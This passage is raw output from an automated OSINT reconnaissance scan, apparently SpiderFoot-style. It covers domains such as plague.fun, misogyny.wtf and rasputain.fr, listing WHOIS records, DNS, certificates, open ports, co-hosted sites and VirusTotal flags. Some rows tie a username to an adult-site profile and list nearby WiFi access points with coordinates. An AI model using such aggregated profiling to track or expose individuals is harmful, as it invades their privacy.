35:FE:02:C5:89:E9:C1:07:29:6D:E8:0E:98:CE:E3:CC: 8E:21:20:20:F3:A4 Signature Algorithm: sha256WithRSAEncryption 52:8e:92:7f:f4:4c:11:de:d4:13:64:4d:85:56:ba:d6:09:84: 44:50:7e:cb:51:b1:b9:86:82:39:17:84:60:36:40:de:b4:2d: bd:f5:7d:13:9e:15:8b:3a:21:41:88:c7:3a:c1:2c:87:b6:e9: 03:53:f1:4b:65:8d:5a:4f:22:bb:a3:87:3b:cd:ed:50:46:83: 89:e2:9c:10:a5:4e:08:c6:11:2f:ff:ad:73:d8:bc:dd:ba:01: 53:6c:af:1a:3d:5d:46:36:20:4e:12:f6:b9:03:a6:37:0a:60: 29:02:20:b8:65:b6:90:85:65:b0:10:50:ec:bd:80:b9:7d:ed: cc:96:8a:96:dd:65:fa:3f:54:1c:61:6f:43:2e:c7:6d:de:52: 5c:e6:a5:29:b5:e6:ce:2b:5b:44:03:cb:cf:3b:c4:56:98:74: ec:81:6c:bd:cc:3a:43:e3:85:ad:c9:a4:4b:69:cb:c5:70:24: be:00:3c:14:1e:e3:29:a0:d4:0b:df:6d:26:46:1b:48:cf:42: 87:0d:3d:cf:e5:54:70:9e:98:86:3b:ba:09:20:44:c1:d0:39: 57:60:09:30:b5:39:47:db:32:ad:91:0a:f3:15:da:af:3a:81: de:a7:0b:32:4a:ef:6f:5d:69:03:a6:23:3d:aa:12:c5:c2:33: ee:ee:b6:86 
plague.fun 2022-12-18 00:21:13 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["77aa9e427dd26384-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": [""]} 188.114.97.0 2022-12-18 00:16:27 Open TCP Port No SSL Certificate Analyzer 0 0 2 0 None 188.114.97.3:443 188.114.97.3 2022-12-18 00:18:19 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.7:443 188.114.97.0/24 2022-12-18 00:02:53 IP Address No Mnemonic PassiveDNS 205 0 1 0 None 34.149.204.188 rasputain.fr 2022-12-18 00:08:40 BGP AS Membership No RIPE 0 0 3 0 None 13335 172.67.160.0/20 2022-12-18 00:09:43 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.3', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731735c0f301524bacadf25fc68c8340df94e2d7366203c8ad0', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': u'https://webmail.nitrowe.com/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': 
u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'webmail.nitrowe.com', u'summary': u'Date: Fri, 04 Nov 2022 13:59:03 GMT\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nCache-Control: max-age=3600\r\nExpires: Fri, 04 Nov 2022 14:59:03 GMT\r\nLocation: https://webmail.nitrowe.com/\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=BA1Vid9dVmpKA8%2BG3ftmtWNscgMs8xMH9Mle4NZR7mUzuHnxITKk582C9dTsFPDYL7j4Q3hk1maVbwLOIrt5igAxQsfnTQiY2NYnmbngLAe2ffHgq%2Frssz%2FONei1iEk2CZS%2FRkxQ"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764dde363c6c0ba5-AMS\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n0\r\n\r\n', u'time': u'2022-11-04T13:59:03.151987198Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'188.114.97.3', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'188.114.96.0/22'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731735c0f301524bacadf25fc689ab7a3fdceeb7bdb7851d001', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, 
u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': u'https://test.dchidell.com/', u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'NL-NH', u'country_iso_code': u'NL', u'city_name': u'Amsterdam', u'location': {u'lat': 52.3759, u'lon': 4.8975}, u'country_name': u'Netherlands', u'continent_name': u'Europe', u'region_name': u'North Holland'}, u'host': u'test.dchidell.com', u'summary': u'Date: Fri, 04 Nov 2022 13:59:02 GMT\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nCache-Control: max-age=3600\r\nExpires: Fri, 04 Nov 2022 14:59:02 GMT\r\nLocation: https://test.dchidell.com/\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=RoJDd3f5fsjuWB5klGxf3PlyBwXw8IOKUGUFQ2%2BJVDB0oVRQ%2B8%2BjMLE6CEynphqbYQ0aqV%2Bc%2FIIw6bOp0eLfqOqe04shN5U0MD%2BbY1SMZqRKI7EzAj%2BGR0G5t808t0FxpO9ETw%3D%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764dde32af1c0bba-AMS\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\n\n0\r\n\r\n', u'time': u'2022-11-04T13:59:02.799770114Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'188.114.97.3', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': 
[...] 188.114.97.3
2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None (Net ID: 00:02:2D:04:09:0C) 37.780462,-122.390564
2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None knottyshrillwireframes.bienlineagts.repl.co 34.149.204.188
2022-12-18 00:23:30 Raw DNS Records No DNS Raw Records 0 0 2 0 None ftp.zerotwo-best-waifu.online. 577 IN CNAME zerotwo-best-waifu.online. ftp.zerotwo-best-waifu.online
2022-12-18 00:03:10 Co-Hosted Site - Domain Name No SSL Certificate Analyzer 0 0 1 0 None webapps.net zerotwo-best-waifu.online
2022-12-18 00:06:44 Open TCP Port No Pulsedive 0 0 2 0 None 104.21.19.243:8080 104.21.19.243
2022-12-18 00:05:48 Raw Data from RIRs No Certificate Transparency 1 0 1 0 None [{u'not_after': u'2022-12-19T21:18:05', u'not_before': u'2022-09-20T21:18:06', u'issuer_ca_id': 180753, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.misogyny.wtf', u'serial_number': u'00f4f0fa2fab28c37d0eb0025f9f06b10c', u'entry_timestamp': u'2022-09-20T22:18:07.22', u'id': 7584290631}, {u'not_after': u'2022-12-19T20:09:19', u'not_before': u'2022-09-20T20:09:20', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'043bc1da8c2d8d3c49c8fb3d44b5c287b43a', u'entry_timestamp': u'2022-09-20T21:09:20.772', u'id': 7588954405}, {u'not_after': u'2022-12-19T20:09:19', u'not_before': u'2022-09-20T20:09:20', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'043bc1da8c2d8d3c49c8fb3d44b5c287b43a', u'entry_timestamp': u'2022-09-20T21:09:20.442', u'id': 7584197572}, {u'not_after': u'2022-10-21T20:47:27', u'not_before': u'2022-07-23T20:47:28', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'04d69ed288e9c1897428652d6e8809509f4f', u'entry_timestamp': u'2022-07-23T21:47:29.495', u'id': 7186449707}, {u'not_after': u'2022-10-21T20:47:27', u'not_before': u'2022-07-23T20:47:28', u'issuer_ca_id': 183283, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u"C=US, O=Let's Encrypt, CN=E1", u'common_name': u'*.misogyny.wtf', u'serial_number': u'04d69ed288e9c1897428652d6e8809509f4f', u'entry_timestamp': u'2022-07-23T21:47:28.726', u'id': 7185452708}, {u'not_after': u'2022-10-21T20:45:09', u'not_before': u'2022-07-23T20:45:10', u'issuer_ca_id': 180753, u'name_value': u'*.misogyny.wtf\nmisogyny.wtf', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.misogyny.wtf', u'serial_number': u'392fd3a5c8f5abd1137069a51df6ba07', u'entry_timestamp': u'2022-07-23T21:45:11.265', u'id': 7185973399}] misogyny.wtf
2022-12-18 00:21:13 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b1357a3bc72c05-ORD Content-Encoding: gzip 188.114.97.0
2022-12-18 00:31:08 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@namecheap.com Domain Name: plague.club Registry Domain ID: D1C093C1CE747444390668EB5348FF659-NSR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-03-20T06:18:36Z Creation Date: 2020-04-14T23:55:11Z Registry Expiry Date: 2023-04-14T23:55:11Z Registrar: NameCheap, Inc.
Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.6613102107 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Capital Region Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: IS Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: REDACTED FOR PRIVACY Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: REDACTED FOR PRIVACY Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registry Admin ID: REDACTED FOR PRIVACY Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: REDACTED FOR PRIVACY Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: REDACTED FOR PRIVACY Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registry Tech ID: REDACTED FOR PRIVACY Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: REDACTED FOR PRIVACY Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: REDACTED FOR PRIVACY Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:03Z <<< For more information on Whois status codes, please visit https://icann.org/epp The Service is provided so that you may look up certain information in relation to domain names that we store in our database. Use of the Service is subject to our policies, in particular you should familiarise yourself with our Acceptable Use Policy and our Privacy Policy. The information provided by this Service is 'as is' and we make no guarantee of it its accuracy. You agree that by your use of the Service you will not use the information provided by us in a way which is: * inconsistent with any applicable laws, * inconsistent with any policy issued by us, * to generate, distribute, or facilitate unsolicited mass email, promotions, advertisings or other solicitations, or * to enable high volume, automated, electronic processes that apply to the Service. 
You acknowledge that: * a response from the Service that a domain name is 'available', does not guarantee that is able to be registered, * we may restrict, suspend or terminate your access to the Service at any time, and * the copying, compilation, repackaging, dissemination or other use of the information provided by the Service is not permitted, without our express written consent. This information has been prepared and published in order to represent administrative and technical management of the TLD. We may discontinue or amend any part or the whole of these Terms of Service from time to time at our absolute discretion. Domain name: plague.club Registry Domain ID: D1C093C1CE747444390668EB5348FF659-NSR Registrar WHOIS Server: whois.namecheap.com Registrar URL: http://www.namecheap.com Updated Date: 2022-03-15T06:18:37.01Z Creation Date: 2020-04-14T23:55:11.78Z Registrar Registration Expiration Date: 2023-04-14T23:55:11.78Z Registrar: NAMECHEAP INC Registrar IANA ID: 1068 Registrar Abuse Contact Email: abuse@namecheap.com Registrar Abuse Contact Phone: +1.9854014545 Reseller: NAMECHEAP INC Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registry Registrant ID: Registrant Name: Redacted for Privacy Registrant Organization: Privacy service provided by Withheld for Privacy ehf Registrant Street: Kalkofnsvegur 2 Registrant City: Reykjavik Registrant State/Province: Capital Region Registrant Postal Code: 101 Registrant Country: IS Registrant Phone: +354.4212434 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email: 116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com Registry Admin ID: Admin Name: Redacted for Privacy Admin Organization: Privacy service provided by Withheld for Privacy ehf Admin Street: Kalkofnsvegur 2 Admin City: Reykjavik Admin State/Province: Capital Region Admin Postal Code: 101 Admin Country: IS Admin Phone: +354.4212434 Admin Phone Ext: Admin Fax: Admin Fax Ext: Admin Email: 
116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com Registry Tech ID: Tech Name: Redacted for Privacy Tech Organization: Privacy service provided by Withheld for Privacy ehf Tech Street: Kalkofnsvegur 2 Tech City: Reykjavik Tech State/Province: Capital Region Tech Postal Code: 101 Tech Country: IS Tech Phone: +354.4212434 Tech Phone Ext: Tech Fax: Tech Fax Ext: Tech Email: 116cc296f60d4885bbe79883230f5566.protect@withheldforprivacy.com Name Server: dns1.registrar-servers.com Name Server: dns2.registrar-servers.com DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-17T12:31:04.11Z <<< For more information on Whois status codes, please visit https://icann.org/epp
2022-12-18 00:31:49 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: PLAGUE.ONLINE Registry Domain ID: D209164753-CNIC Registrar WHOIS Server: whois.west.cn Registrar URL: http://www.west.cn Updated Date: 2022-12-16T12:58:58.0Z Creation Date: 2020-11-15T10:10:12.0Z Registry Expiry Date: 2023-11-15T23:59:59.0Z Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD. Registrar IANA ID: 1556 Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Registrant Organization: Wei Cao Registrant State/Province: Jiang Su Registrant Country: CN Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS4.MYHOSTADMIN.NET Name Server: NS5.MYHOSTADMIN.NET Name Server: NS1.MYHOSTADMIN.NET Name Server: NS2.MYHOSTADMIN.NET Name Server: NS3.MYHOSTADMIN.NET DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Registrar Abuse Contact Email: abuse@west.cn Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:31:46.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. 
Domain Name: plague.online Registry Domain ID: zdns-xyz52160522 Registrar WHOIS Server: whois.west.cn Registrar URL: www.west.cn Updated Date: 2020-11-15T10:10:12.0Z Creation Date: 2020-11-15T10:10:12.0Z Registrar Registration Expiration Date: 2023-11-15T23:59:59.0Z Registrar: Chengdu west dimension digital technology Co., LTD Registrar IANA ID: 1556 Reseller: Domain Status: ok http://www.icann.org/epp#ok Registry Registrant ID: Not Available From Registry Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Jiang Su Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CN Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: Registrant Email: link at https://www.west.cn/web/whoisform?domain=plague.online Registry Admin ID: Not Available From Registry Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: Admin Email: link at https://www.west.cn/web/whoisform?domain=plague.online Registry Tech ID: Not Available From Registry Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: Tech Email: link at https://www.west.cn/web/whoisform?domain=plague.online Name Server: ns1.myhostadmin.net Name Server: ns2.myhostadmin.net DNSSEC: signedDelegation Registrar Abuse Contact Email: 
westabuse@gmail.com Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:31:48.0Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en plague.online
2022-12-18 00:51:57 Malicious IP Address Yes VirusTotal 0 0 3 0 None VirusTotal [188.114.96.54] https://www.virustotal.com/en/ip-address/188.114.96.54/information/ 188.114.96.0/24
2022-12-18 00:05:16 Account on External Site No Account Finder 0 0 2 0 None XVIDEOS-profiles (Category: XXXPORNXXX) https://www.xvideos.com/profiles/rasputain rasputain
2022-12-18 00:22:01 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b1f5531bc02c54-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 2a06:98c1:3121::1
2022-12-18 00:21:09 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b334585a3ee180-ORD Content-Encoding: gzip 188.114.96.0
2022-12-18 00:20:59 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Date: Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Vary: Accept-Encoding Server: cloudflare CF-RAY: 77b2699f7f992d88-ORD Content-Encoding: gzip 2606:4700:3033::6815:1cf0
2022-12-18 00:03:35 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lhcp3240.webapps.net 81.88.52.240
2022-12-18 00:02:48 IP Address No Mnemonic PassiveDNS 134 0 1 0 None 172.67.147.230 plague.fun
2022-12-18 00:09:31 Physical Location No LeakIX 0 0 2 0 None United States 172.67.169.215
2022-12-18 00:08:28 Open TCP Port No Pulsedive 0 0 3 0 None 81.88.52.222:80 81.88.52.222
2022-12-18 00:09:47 Co-Hosted Site No HackerTarget 0 0 2 0 None auroramediagroup.xyz 172.67.147.230
2022-12-18 00:18:27 Malicious IP Address Yes VirusTotal 0 1 2 0 None VirusTotal [188.114.96.1] https://www.virustotal.com/en/ip-address/188.114.96.1/information/ 188.114.96.1
2022-12-18 00:09:46 Co-Hosted Site No HackerTarget 0 0 2 0 None atmospherecomm.store 172.67.147.230
2022-12-18 00:16:35 Physical Location No numverify 0 0 3 0 None IS +3544212434
2022-12-18 00:13:15 Affiliate Description - Category No DuckDuckGo 0 0 2 0 None Technology companies based in the San Francisco Bay Area garrett.ns.cloudflare.com
2022-12-18 00:25:26 Physical Location No MetaDefender 0 0 2 0 None Burt, United States 172.67.147.230
2022-12-18 00:16:27 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None cdnjs.cloudflare.com 188.114.97.3
2022-12-18 00:04:28 Email Gateway (DNS MX Records) No DNS Raw Records 0 0 1 0 None eforward5.registrar-servers.com misogyny.wtf
2022-12-18 00:32:11 Similar Domain Yes TLD Searcher 1 0 1 0 None plague.tech plague.fun
2022-12-18 00:03:04 Affiliate - IP Address No DNS Look-aside 1 0 2 0 None 90.116.166.107 90.116.166.104
2022-12-18 00:10:04
Linked URL - Internal No URLScan.io 0 0 1 0 None http://misogyny.wtf:2020/parser misogyny.wtf
2022-12-18 00:04:28 Affiliate - Internet Name No DNS Raw Records 1 0 1 0 None eforward5.registrar-servers.com misogyny.wtf
2022-12-18 00:08:56 Raw Data from RIRs No LeakIX 0 0 2 0 None [...] 188.114.96.0
2022-12-18 00:04:00 Country No Country Name Extractor 0 0 1 0 None France rasputain.fr
2022-12-18 00:03:14 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None plague.fun [...]
2022-12-18 00:21:11 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None myLGNet8682 (Net ID: 00:01:36:5B:86:80) 37.780462,-122.390564
2022-12-18 00:21:20 Open TCP Port No Censys 0 0 2 0 None 188.114.97.1:2082 188.114.97.1
2022-12-18 00:12:08 Physical Location No ipapi.co 0 0 2 0 None Toronto, Ontario, ON, Canada, CA 172.67.147.230
2022-12-18 00:13:55 HTTP Status Code No Web Spider 0 0 2 0 None None http://plague.fun
2022-12-18 00:08:38 BGP AS Membership No RIPE 0 0 2 0 None 8075 137.117.0.0/16
2022-12-18 00:21:09 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["77ad7674091a232a-ORD"]} 188.114.96.0
2022-12-18 00:06:44 Open TCP Port No Pulsedive 0 0 2 0 None 104.21.19.243:80 104.21.19.243
2022-12-18 00:03:23 Affiliate - Internet Name No DNS Resolver 0 0 3 0 None lfbn-nic-1-332-113.w90-116.abo.wanadoo.fr 90.116.166.113
2022-12-18 00:16:26 SSL Certificate - Issued by
No SSL Certificate Analyzer 0 0 2 0 None C=US,O=Cloudflare\, Inc.,CN=Cloudflare Inc ECC CA-3 188.114.96.3 2022-12-18 00:13:49 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@godaddy.com Domain Name: plague.co Registry Domain ID: D4A395B67AB204CFAABA57C93F6BB05A4-NSR Registrar WHOIS Server: whois.godaddy.com Registrar URL: whois.godaddy.com Updated Date: 2022-06-05T11:58:47Z Creation Date: 2018-05-30T17:52:58Z Registry Expiry Date: 2023-05-30T17:52:58Z Registrar: GoDaddy.com, LLC Registrar IANA ID: 146 Registrar Abuse Contact Email: abuse@godaddy.com Registrar Abuse Contact Phone: +1.4806242505 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited Registry Registrant ID: REDACTED FOR PRIVACY Registrant Name: REDACTED FOR PRIVACY Registrant Organization: Domains By Proxy, LLC Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED 